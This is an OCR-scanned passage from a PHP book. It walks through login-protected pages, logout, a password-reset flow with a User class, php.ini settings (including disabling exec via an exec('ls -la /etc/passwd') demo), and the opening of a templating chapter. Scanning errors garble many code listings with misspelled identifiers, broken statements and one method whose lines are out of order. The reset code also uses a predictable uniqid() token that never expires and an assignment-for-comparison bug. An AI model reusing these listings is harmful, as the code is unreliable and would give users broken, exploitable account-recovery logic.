wrapped in an i f () conditional. A user who logs in successfully gets redi¬ 
rected to a page called authenticated.php. If the login is unsuccessful, 
the user gets sent back to login. php with an error. 
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Adding Authenticated Pages 

Your application has the capability to register users and to have them log in. 
It uses a class for handling user information, but there’s really nothing for 
users to do once they log in. At this point, you don’t even have an authenti¬ 
cated page built! It’s time to fix that. 


Budding a protected page 

Pages that need to be protected — in other words, those that a user needs 
to be logged in to in order to access them — can be built easily with the help 
of the User class. Whenever a user is logged in, a property called isLoggedin 
gets set to Boolean true. That means you can effectively check whether a 
user is logged in on any page by checking that property. 



Session is used heavily as part of the application. You might be tempted to 
access things like the isLoggedin parameter right from the session. However, 
best practice is to use the object-oriented interface (the user class) whenever 
possible. There are times when the object-oriented interface may need to do 
additional checks to see if a user is logged in (or whatever other property is 
being requested). Therefore, by using the object-oriented interface you’re 
keeping in line with the abstraction techniques and will allow the greatest 
flexibility later. 


The authenticated page used by the login-process file is called authenticated. 
php. The code for authenticated.php is in Listing 4-12. 


Listing 4-12: Code for an Authenticated Page 

<?php 

require_once("functions.inc") ; 

$user = new User; 

if ( !$user->isLoggedln) { 

die(header("Location: login.php")); 

} 

?> 

<!doctYpe html> 

<html> 

<head> 

<title>Super Secret Authenticated Page</title> 
</head> 

<body> 

<div> 

<?php print "Welcome {$user->firstName}<br />\n"; ?> 
</div> 
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<div> 

<a href="logout.php">Click here to logout</a> 

</div> 

</bodY> 

</html> 

The heart of the page’s code is right at the top, where a new user is instanti¬ 
ated and the isLoggedin property is checked. If the isLoggedin property 
is false, the user is redirected back to the login page. If the isLoggedin 
property is true, then the page’s execution continues and the user is wel¬ 
comed to the page, as shown in Figure 4-5. 


Figure 4-5: 

An authenti¬ 
cated page. 



Welcome Steve 
Click here to logout 
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You can see that the authenticated page refers to a logout .php file. That 
file has yet to be built. 

Essentially, any page that needs to be protected should have this code 
added to it: 

<?php 

require_once("functions.inc") ; 

$user = new User; 

if (!$user->isLoggedln) { 

die(header("Location: login.php")); 

} 


?> 

With that code (and the accompanying class and support files), a user can’t 
access the page unless the isLoggedin property is set to true. 
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Buitdin^ a to^ out pa^e 

A page to securely log out of the application is just as important as logging 
in. The page needs to do the obvious, change the isLoggedin property to 
false, but should also clear any user data out of the session too. And for an 
extra layer of security, the session itself can be destroyed, as recommended 
in the PHP manual. 

The actual logout function should be added to the User class, since that’s 
essentially a part of the user-related duties. The logout functionality might 
also be used from multiple pages, thus making it a good candidate for 
abstraction into a common area. There are two tasks then: 

♦ Build the logout function and add it to the User class. 

♦ Build the logout page itself. 

You tackle both of them next. 

Creating a logout function 

A logout function not only needs to set the isLoggedin property to false, 
but also needs to clear the session variables related to the login. Doing this 
helps to prevent the user from potentially still being logged in or having his 
information remain in the browser. 

The PHP manual’s page for session_destroy contains some helpful code 
for completely removing the session, which you adapt for your logout func¬ 
tion; no point reinventing the wheel here. 

You can view the PHP manual’s session_destroy page at http: / /php. 
net/manual/en/function.session-destroy.php. 

Listing 4-13 shows the logout function. This function is added to the 
ClassUser .php file, within the class (just before the closing brace to end 
the User class). 


Listing 4-13: The Logout Function 

public function logout() { 

$this->isLoggedln = false; 

if (session_id() == '') { 
session_start(); 

} 

$_SESSI0N['isLoggedin'] = false; 
foreach ($_SESSI0N as $key => $value) { 
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$_SESSION[$keY] = 
unset($_SESSION[$keY]); 


$_SESSI0N = arraY(); 

if (ini_get("session.use_cookies")) { 

$cookieParameters = session_get_cookie_params(); 
setcookie(session_name(), timeO - 28800, 

$cookieParameters['path'],$cookieParameters[' 

domain'], 

$cookieParameters['secure'],$cookieParameters 

['httponlY'] 

) ; 

} //end if 
session_destroY(); 
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} //end function logout 


This function sets the isLoggedin property to false and then proceeds 
to clear all session variables. If HTTP cookies are used for the session, a new 
cookie is sent to the browser, effectively expiring the cookie. 

Budding the logout page 

When users click the Logout link anywhere on the site, they’ll be sent to a 
page called logout. php, which performs the actual logout and sends the 
users back to the login page. The code for the logout page, called logout. 
php, is only four lines and is shown in Listing 4-14. 


Listing 4-14: The Logout Page 

<?php 

require_once("functions.inc"); 

$user = new User; 

$user->logout(); 

die(header("Location: login.php")); 

?> 

With that code in place, a user can register, log in, and log out of the appli¬ 
cation. However, two areas should be enhanced. First, if a user goes to the 
login page, you should call the logout function; second, you should also set 
the isLoggedin property to false whenever the authenticate method is 
called. 
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Enhancing logout 

When users go to the login page, you should make sure that they’re really 
logged out. If you don’t, a user could easily navigate there, see an empty 
form, and think she’s logged out. In reality, her session is still going, so if 
another user walked up to the first user’s computer, the second user could 
navigate through the first user’s history and get into the application. Here’s 
a demonstration of that behavior. 

This demonstration begins by logging in to the application, shown in Figure 4-6. 


Figure 4-6: 

Logging 
in to the 
application. 


in, as shown in Figure 4-7. 


Figure 4-7: 

Logged 
in to the 
application. 


With the correct credentials, you re logged 
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http://tt/Wb6c. P - a 0 X II jg Login 


Login 

E-mail Address:* suehring@braingia com 
Password:’ .. 


SubnTitQuefv 
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Without clicking logout, simply clicking the Back button in the browser goes 
back to the login. php page. The login. php page is empty, as shown in 
Figure 4-8, and the user might think that he is now logged out. 




i http://Wfcl/b6c. P - 8 C X 


; Login 


Login 

E-mail Address * 


Password:* 


Figure 4-8: 

The login 

page, 

accessed 

from 

browser 

history. 


SiJimtt Query " j1 
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However, using the Forward button or manually entering the authenticated, 
php page reveals that the user is still logged in, as shown in Figure 4-9. 


Figure 4-9: 

Still logged 

in when 

accessed 

through 

browser 

history. 



Luckily, the fix for this is rather easy. Adding a call to the logout method 
to the top of the login page solves the issue. Any time the login. php page 
is accessed, the user will be logged out. While this might catch a user who 
mistakenly accesses the login page again, resulting in her having to log in 
again, it’s better than the alternative of allowing unauthorized access to the 
application. 
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The top of the login.php page, prior to the < ! doctype html>, now looks 
like this: 

<?php 

require_once("functions.inc"); 

$user = new User; 

$user->logout(); 

?> 

One final enhancement is to the authenticate method within ClassUser .php. 
The isLoggedin session variable and property should be set to false any 
time a user tries to authenticate. To accomplish that task, add the following 
code to the top of the authenticate method: 

if (session_id() == ”") { 
session_start(); 

} 

$_SESSI0N['isLoggedin'] = false; 

$this->isLoggedln = false; 


Adding E-mail Functionality 

Users forget their passwords. Sometimes they even forget their usernames, 
but because your application uses an e-mail address as the username, that 
scenario is less likely to happen (hopefully). You can add the capability for 
a user to reset his password. Doing so involves some additional database 
work and new pages, so we tell you how to do that here. Sending the actual 
e-mail is rather trivial; it’s all the stuff surrounding password resets that gets 
a bit more complex. 

The overall flow for a password reset on this site will call for a reset page, 
where users can enter their e-mail address. When submitted, the form will 
look up the e-mail address to see if it’s a valid account and will then create a 
unique URL for the password reset. This unique URL will contain a pseudo¬ 
random string of characters and will also be stored in a database table on 
the server. 

When the user receives the e-mail response to the request for a password 
reset, she follows the link with the unique URL. The user then fills in her 
e-mail address again, along with her new password. This information is 
looked up in the database, and the random string is compared to the one 
from the user, along with her e-mail address. If both match, then you can be 
fairly certain that the same person who requested the reset also controls 
that e-mail address and is hopefully then authorized to do a password reset 
for that account. 
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Assuming everything checks out, the password is reset and the user can log 
in with the new password immediately. You build this functionality next. 

BuiUin^ the password reset database 

The database table for the password reset will store the unique random 
characters for the URL, the ID of the e-mail address being reset, the date the 
reset request was received, and whether the reset request is active. 

The CREATE statement looks like this: 

CREATE TABLE resetPassword ( 

id INT NOT NULL PRIMARY KEY AUTO_INCREMENT, 

einail_id INT, 

pass_keY VARCHAR(255), 

date_created DATETIME, 

status VARCHAR(255) 

) ; 

The status field might be used at a later date to set old reset requests to 
inactive. Notice that the einail_id field is an int type. The unique ID from 
the Customer table will be used here, rather than the actual e-mail address. 
Doing so saves disk space and maintains data integrity at the same time. 

This table should be created prior to continuing. 

Budding the password recoOeri^ pa^e 

The first password recovery page is a simple form that contains only one 
field: the e-mail address. The form sends a POST to a file called email- 
process . php, following the pattern used throughout the chapter. 

Listing 4-15 shows the code for the initial e-mail password page. 


Listing 4-15: Code for the Initial Password Recovery Page 

<?php require_once("functions.inc"); ?> 

<!doctYpe html> 

<html> 

<head> 

<script tYPe="text/javascript" src="https://ajax.googleapis. 

com/ajax/libs/jquery/l.8.3/jquery.min.js"></script> 
<script type="text/javascript" src="email.js"></script> 
<link rel=''stylesheet" type= ”text/css" href="form.css"> 
<title>Forgotten Credentials</title> 

</head> 

<body> 

<form id="emailForm" method="POST" action="email-process. 

php" > 

<div> 
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Listing 4-15 (continued) 

<fieldset> 

<legend>Password Recovery</legend> 

<div id="errorDiv"> 

<?php 

if (isset($_SESSION['error']) && isset($_ 

SESSION['formAttempt'])) { 

unset($_SESSION['formAttempt']); 

print "Errors encountered<br />\n"; 
foreach ($_SESSION['error'] as $error) { 
print $error . "<br />\n"; 

} //end foreach 
} //end if 

?> 

</div> 

<label for="email">E-mail Address:* </label> 

<input tYpe="text" id="email" name="email"> 

<span class="errorFeedback errorSpan" id="emailError">E- 
mail is required</span> 

<br /> 

<input tYpe="submit" id="submit" name="submit"> 
</fieldset> 

</div> 

</form> 

</bodY> 

</html> 

When viewed in a browser, the page looks like the one in Figure 4-10. 


Figure 4-10: 

The page 
used for 
password 
recovery. 
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Password Recovery 
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Addiny a link to the passuford recot/ery paye 

The password recovery page should be linked from the login page, so 
that users can get there easily. The following code should be added to the 
login.php page immediately above the closing </f ieldset> tag: 

<br /> 

<a href=''emailpass .php''>Forgot your password?</a> 

Figure 4-11 shows the resulting page. 


Figure 4-11: 

Adding a 
link to the 
forgotten 
password 
page. 
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Addiny Jat/aScript 

The password recovery page uses its own JavaScript validation, shown in 
Listing 4-16. 


Listing 4-16: JavaScript for Password Recovery Validation 

$(document).ready(function() { 

$("#loginForm").submit(function(e) { 

removeFeedback(); 
var errors = validateForm(); 
if (errors == ”") { 
return true; 

} else { 

provideFeedback(errors); 
e.preventDefault(); 
return false; 

} 

}) ; 


(continued) 
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Listing 4-16 (continued) 

function validateForm() { 

var errorFields = new Array(); 

//Check required fields have something in them 
if ($('#email').val() == "") { 
errorFields.push('email'); 

} 

//very basic e-mail check, just an @ symbol 
if (!($('#email').val().indexOf) > 2) && 

($('#email').val().indexOf("@"))) { 
errorFields.push('email'); 

} 

return errorFields; 

} //end function validateForm 

function provideFeedback(incomingErrors) { 

for (var i = 0; i < incomingErrors.length; i++) { 

$("#" + incomingErrors[i]).addClass("errorClass"); 
$("#" + incomingErrors[i] + "Error"). 
removeClass("errorFeedback"); 

} 

$("#errorDiv").html("Errors encountered"); 

} 

function removeFeedback() { 

$("#errorDiv").html(""); 

$('input').each(function() { 

$(this).removeClass("errorClass"); 

}) ; 

$('.errorSpan').each(function() { 

$(this).addClass("errorFeedback"); 

}) ; 

} 


}) ; 


Building the success pa^e 

When a user fills out the form to reset his password, assuming he has done it 
successfully, he gets sent to a page called email-success .php. Listing 4-17 
shows the code for that page. 


Listing 4-17: The Password Recovery E-Mail Success Page 

<!doctype html> 

<html> 

<head> 

<title>Success</title> 
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</head> 

<body> 

<div> 

Password reset instructions will be e-mailed to you 

</div> 

<div> 

<a href="login.php”>Click here to login</a> 

</div> 

</body> 

</html> 


Buildiny the passu^ord reset paye 

The actual password reset form contains fields for the e-mail address and 
passwords. Users access it when they follow a link in their e-mail. (We show 
that behind-the-scenes code later.) For now, Listing 4-18 shows the code for 
the password reset page, called reset .php. 
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Listing 4-18: Password Reset Page 

<?php 

require_once("functions.inc") ; 

$invalidAccess = true; 

if (isset($_GET['user']) && $_GET['user'] != "") { 

$invalidAccess = false; 

$hash = $_GET['user']; 

} 

//if they've attempted the form but had a problem, we need to 
allow them in. 

if (isset($_SESSION['formAttempt']) && $_SESSION['formAttempt'] 
== true) { 

$invalidAccess = false; 

$hash = $_SESSION['hash']; 

} 

if ($invalidAccess) { 

die(header("Location: login.php")); 

} 

?> 

<!doctype html> 

<html> 

<head> 

<link rel="stylesheet" type="text/css" href="form.css"> 
<title>Reset Password</title> 

</head> 

<body> 


(continued) 
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Listing 4-18 (continued) 

<form id="loginForm" method=”POST" action="reset-process. 

php" > 

<div> 

<fieldset> 

<legend>Reset Password</legend> 

<div id="errorDiv"> 

<?php 

if (isset($_SESSION['error']) && isset($_ 

SESSION['formAttempt'])) { 

unset($_SESSION['formAttempt']); 
print "Errors encountered<br />\n"; 
foreach ($_SESSION['error'] as $error) { 
print $error . "<br />\n"; 

} //end foreach 
} //end if 

?> 

</div> 

<label for="email">E-mail Address:* </label> 

<input tYpe="text" id="email" name="email"> 

<span class="errorFeedback errorSpan" id="emailError">E- 
mail is required</span> 

<br /> 

<label for="passwordl">Password:* </label> 

<input tYpe="password" id="passwordl" name="passwordl"> 
<span class="errorFeedback errorSpan" 
id="passwordlError">Password is required</span> 

<br /> 

<label for="password2">Password:* </label> 

<input tYpe="password" id="password2" name="password2"> 
<span class="errorFeedback errorSpan" 
id="password2Error">Passwords don't match</span> 

<br /> 

<?php 

print "<input tYpe=\"hidden!" name=\"hash!" 
value=!"{$hash}!">!n"; 

?> 

<input tYpe="submit" id="submit" name="submit"> 
</fieldset> 

</div> 

</form> 

</bodY> 

</html> 

This code creates a form, but prior to doing so it looks to see how the user 
arrived at the page. The first thing examined is whether a $_get index of 
' user' is set and is available. If so, it means the user probably arrived by 
following a link in her e-mail. The ' user' index contains the unique value 
generated by your program (that you see later). 
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If the $_GET [' user ' ] variable is not available, next look to see if the user 
already tried submitting the form and had a problem. The problem might 
be as simple as the passwords he entered don’t match. Regardless, if he has 
attempted to fill out the form, the f ormAttempt index of $_SESSI0N will be 
set. If it is, then you allow the user to continue. 

If neither $_get [' user ' ] nor $_SESSI0N [' f ormAttempt ' ] is available, 
then the user probably shouldn’t be here, so you redirect him away. 

Assuming that the user should be here and fills out the form correctly, you 
submit the form’s contents to a file called reset-process .php. 
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Buildiny the success paye 

Like other pages, if the user fills the form out correctly, he gets sent to a 
success page, this time reset-success .php, shown in Listing 4-19. 


Listing 4-19: The Reset Success Page 

<!doctYpe html> 

<html> 

<head> 

<title>Reset Success</title> 

</head> 

<body> 

<div> 

Your password has been reset 

</div> 

<div> 

<a href="login.php”>Click here to login</a> 

</div> 

</bodY> 

</html> 

BuiUin^ the process files 

Both the initial password recovery page and the reset page have their own 
processing files that take care of the work of actually e-mailing and resetting 
passwords, respectively. Actually, the process pages call the User class for 
the real work, but process pages are handy for validation and handling busi¬ 
ness rule logic. Keep reading for instructions on how to create these two 
files. 

Creating the password recovery process file 

The password recovery processing file, called email-process .php, is 
shown in Listing 4-20. 
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Listing 4-20: The Password Recovery Process File 

<?php 

require_once('functions.inc'); 

//prevent access if they haven't submitted the form, 
if (!isset($_POST['submit'])) { 

die(header("Location: login.php")); 

} 

$_SESSION['formAttempt'] = true; 

if (isset($_SESSION['error']) ) { 

unset($_SESSION['error']); 

} 

$_SESSION ['error ' ] = arrayO; 

$required = array("email"); 

//Check required fields 
foreach ($required as $requiredField) { 
if (!isset($_POST[$requiredField]) || $_POST 

[$requiredField] == "") { 

$_SESSION['error'][] = $requiredField . " is 

required."; 

} 

} 

if (!filter_var($_POST['email'],FILTER_VALIDATE_EMAIL)) { 

$_SESSION['error'][] = "Invalid e-mail address"; 

} 

if (count($_SESSION['error']) >0) { 

die(header("Location: emailpass.php")); 

} else { 

$user = new User; 

if ($user->emailPass($_POST['email'])) { 
unset($_SESSION['formAttempt']); 
die(header("Location: email-success.php")); 

} else { 

$_SESSION['error'][] = "There was a problem locating 
the e-mail address."; 

die(header("Location: emailpass.php")); 

} 

} 

?> 

There’s not much complexity involved in this file — at least none that you 
haven’t seen a few times already. Much of the detail involves validation 
logic. Assuming everything is valid, the User class is instantiated and the 
emailPass () method is called. You build that later. 
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Creating the reset process file 

The reset process file follows the same pattern as the e-mail process file. 
Listing 4-21 shows the code for the reset process file. 


Listing 4-21: The Reset Process File 

<?php 

require_once('functions.inc'); 

//prevent access if they haven't submitted the form, 
if (!isset($_POST['submit'])) { 

die(header("Location: login.php")); 

} 

$_SESSION['formAttempt'] = true; 

if (isset($_SESSION['error'])) { 

unset($_SESSION['error']); 

} 

$_SESSION['error'] = array(); 

$required = array!"email","passwordl","password2"); 

//Check required fields 

foreach ($required as $requiredField) { 

if (!isset($_POST[$requiredField]) || $_ 

POST[$requiredField] == "") { 

$_SESSION['error'][] = $requiredField . " is 
required."; 

} 

} 

if (!filter_var($_POST['email'],FILTER_VALIDATE_EMAIL)) { 

$_SESSION['error'][] = "Invalid e-mail address"; 

} 

if (count($_SESSION['error']) >0) { 

die(header("Location: reset.php")); 

} else { 

$user = new User; 

if ($user->validateReset($_POST)) { 

unset($_SESSION['formAttempt']); 
die(header("Location: reset-success.php")); 

} else { 

if ($user->errorType = "nonfatal") { 

$_SESSION['hash'] = $_POST['hash']; 

$_SESSION['error'][] = "There was a problem with 
the form."; 

die(header("Location: reset.php")); 

} else { 
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Listing 4-21 (continued) 

$_SESSION['error'][] = "There was a problem with 
the form."; 

die(header("Location: emailpass.php")); 

} 


} 

} 

?> 

One new item in this file is the concept of an error type. Specifically, the appli¬ 
cation now defines the type of error encountered as being fatal, meaning that 
the processing shouldn’t continue, and nonfatal, meaning the user can be 
alerted to the issue and possibly fix it. You can see this reflected in the check 
for errorType in the code. If it’s a nonfatal error, then you keep the unique 
ID in session and let the user try again. If you notice what you believe to be 
a fatal error, then you don’t let the user try again. An example of a fatal error 
might be something that you detect as a possible attempt to hack into the 
application. You don’t want to allow the user to continue in that case, and you 
might take other action, like blocking her IP address, and so on. 

For now, use the nonfatal designation in this file and within the User class, 
which you see next. 

BuiUin^ the ctass methods 

The final step in the password reset process is to build functions or methods 
for handling the steps involved. You have already built the pages and the 
processing files, so all you have left to do is add methods to the user class. 



Adding an e-mail method 

The emailPass method, which is called from within the email-process. 
php file from Listing 4-20, is responsible for looking up the e-mail address 
entered by the user, generating a unique hash, entering that information into 
the database, and e-mailing the reset instructions to the user. 

A useful abstraction, which is not included in this chapter, would be to 
create methods for each of those duties, such as one to return the user’s ID 
and another to generate a unique hash. 

Listing 4-22 shows the emailPass method, which should be added to the 
User class. 
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Listing 4-22: The emailPass Method 

public function emailPass($user) { 

$mysqli = new mysqli(DBHOST,DBUSER,DBPASS,DB); 
if ($mysqli->connect_errno) { 

error_log("Cannot connect to MySQL: ” 
$mysqli->connect_error); 

return false; 

} 
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$hash = uniqid("”,TRUE); 

$safeHash = $mysqli->real_escape_string($hash); 
$insertQuery = "INSERT INTO resetPassword (email_ 
id,pass_k;ey,date_created, status) " . 

” VALUES ('{$id}','{$safeHash}',NOW(),'A')”; 
if (!$mysqli->query($insertQuery)) { 

error_log(”Problem inserting resetPassword row 
for ” . $id); 

$_SESSION['error'][] = "Unknown problem"; 
return false; 

} 

$urlHash = urlencode($hash); 

$site = "http://localhost"; 

$resetPage = "/reset.php"; 

$fullURL = $site . $resetPage . "?user=" . $urlHash; 

//set up things related to the e-mail 
$to = $row['email']; 

$subject = "Password Reset for Site"; 

$message = "Password reset requested for this site.X 
r\n\r\n"; 

$message .= "Please go to this link to reset your 
password:\r\n"; 

$message .= $fullURL; 

$headers = "Erom: webmasterSexample.com\r\n"; 
mail($to,$subject,$message,$headers); 
return true; 


// first, lookup the user to see if they exist. 
$safeUser = $mysqli->real_escape_string ($user) ,- 
$query = "SELECT id,email EROM Customer WHERE email = 
{$safeUser}'"; 

if (!$result = $mysqli->query($query)) { 

$_SESSION['error'][] = "Unknown Error"; 
return false; 

} 

if ($result->num_rows == 0) { 

$_SESSION['error'][] = "User not found"; 
return false; 

} 

$row = $result->fetch_assoc(); 

$id = $row['id']; 


} //end function emailPass 
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The PHP mail () function is used in the emailPass method. This built-in 
function accepts four arguments: the destination (To) for the e-mail, the subject 
of the e-mail, the actual message itself, and any additional headers. Those 
additional headers include things like the From: header that you typically 
see in an e-mail, but can also include things like the Reply-To: header, and 
CC and BCC headers too. 

Creating the (/alidation method 

The validateReset () method is called from the reset-process file and 
has the task of validating everything sent by the user for this request and 
also carrying out the task of resetting the password. Listing 4-23 shows the 
validateReset () method, which should be added to the User class. 


Listing 4-23: The validateReset Method 

public function validateReset($formInfo) { 

$passl = $formInfo['passwordl']; 

$pass2 = $formInfo['password2']; 
if ($passl != $pass2) { 

$this->errorTYpe = "nonfatal"; 

$_SESSION['error'][] = "Passwords don't match"; 
return false; 

} 

$mysqli = new mysqli(DBHOST,DBUSER,DBPASS,DB); 
if ($mysqli->connect_errno) { 

error_log("Cannot connect to MySQL: " . 
$mysqli->connect_error); 

return false; 

} 

$decodedHash = urldecode($formlnfo['hash']); 
$safeEmail = $mysqli->real_escape_ 
string($formInfo['email']); 

$safeHash = $mysqli->real_escape_ 
string($decodedHash); 

$query = "SELECT c.id as id, c.email as email FROM 
Customer c, resetPassword r WHERE " . 

"r.status = 'A' AND r.pass_key = '{$safeHash}' " 

" AND c.email = '{$safeEmail}' " . 

" AND c.id = r.email_id"; 
if (!$result = $mysqli->query($query)) { 

$_SESSION['error'][] = "Unknown Error"; 
$this->errorType = "fatal"; 

error_log("database error: " . $formlnfo['email'] 
. " - " . $formInfo['hash']); 

return false; 

} else if ($result->num_rows == 0) { 
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$_SESSION['error'][] = "Link not active or user 
not found"; 

$this->errorTYpe = "fatal"; 
error_log("Link not active: " . 

$formInfo['email'] . " - " . $formInfo['hash']); 

return false; 

} else { 

$row = $result->fetch_assoc(); 

$id = $row['id']; 

if ($this->_resetPass($id,$passl)) { 
return true; 

} else { 

$this->errorTYpe = "nonfatal"; 

$_SESSION['error'][] = "Error resetting 

password"; 

error_log("Error resetting password: " . 

$id) ; 

return false; 

} 

} 

} //end function validateReset 

The validateReset method first checks to see if the passwords match. No 
use continuing if they don’t. A complex query is then built using the informa¬ 
tion entered. Here’s the select statement: 

SELECT c.id as id, c.email as email 
FROM Customer c, resetPassword r 
WHERE 

r.status = 'A' 

AND r.pass_keY = '{$safeHash}' 

AND c.email = '{$safeEmail}' 

AND c.id = r.email_id 

The SELECT statement looks to retrieve the ID and e-mail address from the 
Customer table. Each of those fields is aliased, which makes accessing them 
programmatically slightly less complex. The tables Customer and reset 
Password are themselves aliased as c and r, respectively. Doing so helps to 
uniquely identify any fields that might share the same column name in each 
table. 

The WHERE clause looks for the status of A (Active) in the resetPassword 
table and looks for a pass_keY equal to the one passed in from the user’s 
form, along with an e-mail address equal to that passed in from the user’s 
form. Finally, the tables are joined by their common column, which is the 
Customer table’s id column and the resetPassword table’s email_id 
column. 
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If all those elements align, then you know that you have a valid and active 
password reset occurring. If nothing is returned from this query, then you 
know that either the e-mail address doesn’t exist or isn’t associated with the 
hash being passed in. 



Assuming that the attempt is valid, a private method, _resetPass, is called. 
Listing 4-24 shows the code for the _resetPass method. 

A private method is one that can only be accessed from within the class 
itself. 


Listing 4-24: The resetPass method 

private function _resetPass($id,$pass) { 

$mysqli = new mysqli(DBHOST,DBUSER,DBPASS,DB); 
if ($mysqli->connect_errno) { 

error_log("Cannot connect to MySQL: " . 
$mysqli->connect_error); 

return false; 

} 

$safeUser = $mysqli->real_escape_string($id); 

$newPass = crypt($pass); 

$safePass = $mysqli->real_escape_string($newPass); 
$query = "UPDATE Customer SET password = 

'{$safePass}' " . 

"WHERE id = '{$safeUser}'"; 
if (!$mysqli->query($query)) { 

return false; 

} else { 

return true; 

} 

} //end function _resetPass 

The code from Listing 4-24 performs no validation and can reset any password, 
given the ID. If the password reset is successful, true is returned. 

Other changes to the User class 

One final change to the User class is to add a property for the errorType. 
The following code is added to the class definition: 

public $errorType = "fatal"; 

With that, you can now create an account, log in, and reset your password 
all with the help of fewer than 1,500 lines of code, and PHP, of course. 
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Chapter 1: Configuring PHP 


In This Chapter 

Understanding the php.ini 

Understanding common changes in the php.ini 


■ iiyhen PHP is installed, certain default settings are selected. These 
WW settings are based on widely used common values. For instance, the 
default PHP settings might display errors to the screen depending on the 
system. There are times when you might need to change these settings. To 
do so, you use the configuration file called php. ini. This chapter looks at 
the php. ini in more detail and shows some of the common configuration 
changes that you might perform on your system. 


Understanding the php.ini 

As discussed in Book 1, Chapter 3, the behavior of PHP is controlled through 
an initialization file called php. ini. Settings such as how sessions are 
handled, how errors are displayed, and what modules are available are all 
controlled through the php. ini file. 

The actual location of the php. ini file varies depending on the operating 
system and how PHP was installed. Refer to Book 1, Chapter 3, for information 
on locating the php. ini or search your system for the file. 



Working vPith the php.ini 

The php. ini file is a plain text file and should be edited with a plain text 
editor such as Notepad, Textpad, or Vi. 

A good practice is to make a copy of the current php. ini before you start 
your edits. Doing so makes it easy to revert to the original copy if you discover 
your changes caused a problem. 

When you make a change to the php. ini, you should reload the Apache 
web server in order to activate the changes. 
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Making changes outside of the php.ini 

Changes you make to the php. ini apply globally, to all sites on a server. 
However, there are times when you want to apply a change either to a site 
or to an individual page. When this occurs, you have several options, two of 
which we discuss here. 


Usin^ .htaccess or Apache configuration 

Some systems allow you to use an . htaccess file to set PHP options. 
Alternatively, if you control the server you can make a site-level change 
within the Apache VirtualHost container. 

The php_value directive applies changes to the PHP configuration. For 
example, if you had a site that needed to upload large files, you could set the 
upload_max_f ilesize PHP directive like so: 

php_value upload_max_filesize lOOM 

The directive won’t be applied server-wide, but rather, only to the files or site 
to which the php_value directive applies. When you use an . htaccess file, 
the change is applied immediately. If you make the change in the Apache 
configuration file, then the Apache server needs to be reloaded for the 
change to take effect. 

Making changes in PHP 

PHP offers two configuration-related functions that are useful for this discus¬ 
sion: ini_get () and ini_set (). The ini_get () function retrieves the 
current value of a given configuration directive, and ini_set () sets the 
value. For example: 

ini_set('upload_max_filesize','lOOM'); 


Understanding Common Configuration Changes 

The remainder of this chapter looks at some common configuration changes 
that you might need for a server running PHP. 

Changing session timeout 

When you use sessions for your application, the data is typically stored 
in files on the server (though this too can be configured in the php. ini). 
Sessions are affected by a garbage collection process that cleans up any 
dead sessions, such as those that haven’t been used for a certain number 
of minutes. 


Understanding Common Configuration Changes 


637 


By default, the garbage collection process looks at sessions with a lifetime of 
1,440 seconds. This means that the user needs to be idle for 1,440 seconds, 
and on the next attempt, his session may or may not be expired. 

A common change is to that garbage collection process, typically to lengthen 
it. This change is typically implemented in the server-wide configuration but 
may apply at the site level too. 

The php. ini setting to control this behavior is 

session.gc_maxlifetime = 1440 

Chan0in0 other session parameters 

Numerous other parameters can be set to control how sessions behave. 
Things like where session files are saved on the server and whether they 
use cookies are available to be changed. Some of the more common changes 
Include setting the domain for the session cookie and the name of the session. 

Both of these are typically set at the site level. The default value for the 
cookie_domain is empty, as reflected here: 

session.name = PHPSESSID 
session.cookie_domain = 

bisabtin^ functions and classes 

You can use the php. ini to disable built-in functions or classes. You might 
find that you don’t want people using certain PHP functions or there might 
be a security vulnerability discovered in a certain function. In any event, you 
can disable the function or class using these directives: 

disable_functions = 
disable_classes = 

Each function expects a comma-separated list of functions or classes to 
be disabled. For example, you might want to disable the exec () function. 
Listing 1-1 shows a simple PHP page to test this functionality. 


Listing 1-1: A Simple PHP Page with exec() 

<?php 

$passwd = exec("ls -la /etc/passwd"); 
print "{$passwd}<br />\n"; 

?> 


Book VII 
Chapter 1 


Configuring PHP 





638 Understanding Common Configuration Changes 


When viewed in a browser, the page looks like that in Figure 1-1. 


Figure 1-1: 

Using the 
execO 
function to 
view a file's 
listing. 


http://tt/fd/b7c; P- aex|[^ 



Changing the php. ini to disable that function means using this directive: 

disable_functions = exec 

Once Apache is restarted, the change will take effect. Reloading the page 
now results in the warning shown in Figure 1-2. 





Warning: execO has been disabled for securit\' reasons 
nl,\■a^'^\■^\■\v•'filb7cl Hstingl-l.pl^ online 3 


Figure 1-2: 

The execO 
function 
has been 
disabled. 



If you’re using a hosting provider, the exec () function may already be dis¬ 
abled. Also, you may not see the warning from Figure 1-2 if your PHP configu¬ 
ration doesn’t display errors. 
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Changing error disptag 

There are several configuration directives around the error display for PHP. 
For example, a development server would likely display errors at all times. 
This is set with the display_errors directive: 

display_errors = On 

A production server would likely never display errors to the user: 

display_errors = Off 

A related directive is the error_reporting directive. This complex directive 
informs PHP what to display for errors. You can configure PHP to report 
only errors that are fatal or you can display more minor errors like notices. 

The error_reporting directive is somewhat complex. See http: / /php. 
net/error-reporting for more information if you need to change this 
directive. 

Changing resource tiniits 

There are times when you need to change the maximum file size allowed, 
for when the file is received through a form POST or uploaded directly or 
received in another way altogether. The upload_max_f ilesize directive 
sets the maximum file size that can be uploaded, while the post_max_size 
directive sets the maximum size of a form POST. If you allow forms to upload 
files, chances are you need to change both directives. 

Additionally, you may find that you need to change the memory limits 
Imposed on a given PHP script or the execution time that a script runs. For 
example, if a user is uploading a large file, it may take several minutes. The 
memory_limit directive sets the amount of memory that can be used by a 
PHP program, and the max_execution_time directive sets how long a 
program can run. 

You can change the maximum time for a script by changing the max_ 
execution_time in the php. ini or by using the set_time_limit () 
function within an individual script. The set_time_liinit () function is a 
common way to solve the problem of a long-running script while preserving 
the server-wide max_execution_time directive’s value. 
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Chapter 2: Building a Templating 
System 


In This Chapter 

Understanding how templates simplify global changes 
Building a template 


7 his chapter looks at template systems and how they can reduce the 
amount of work that you need to do to make a website. We tell you how 
to build a template that’s both simple and powerful for many uses, style the 
page, and then extend the template to other pages on the site. 


After working your way through this chapter, you could further extend the 
templating system to add more specialized pages or even further abstract 
it so that you can add CSS and JavaScript elements on the fly, rather than 
through individual external files. 


Understanding Template Systems 

When you make a website, you frequently use the same layout for the entire 
site. You have a top portion, maybe with a menu; a main content area; 
and a bottom part, maybe with links or a copyright notice. Each and every 
page needs the same CSS and HTML to create this integrated look and feel 
throughout the website. 

When your website has only a couple pages, it’s probably fine to keep the 
HTML and CSS separate. If you need to make a change, say to add a menu 
item or change the copyright year, you can just edit each file. But imagine 
if your website has dozens or even hundreds of pages. Now changing that 
copyright year or adding a menu item (or whatever) becomes quite a task. 
Making global changes like that, without a template, requires you to edit 
every file to make that change and ensure that you don’t make a mistake or 
typo in one of those edits. 

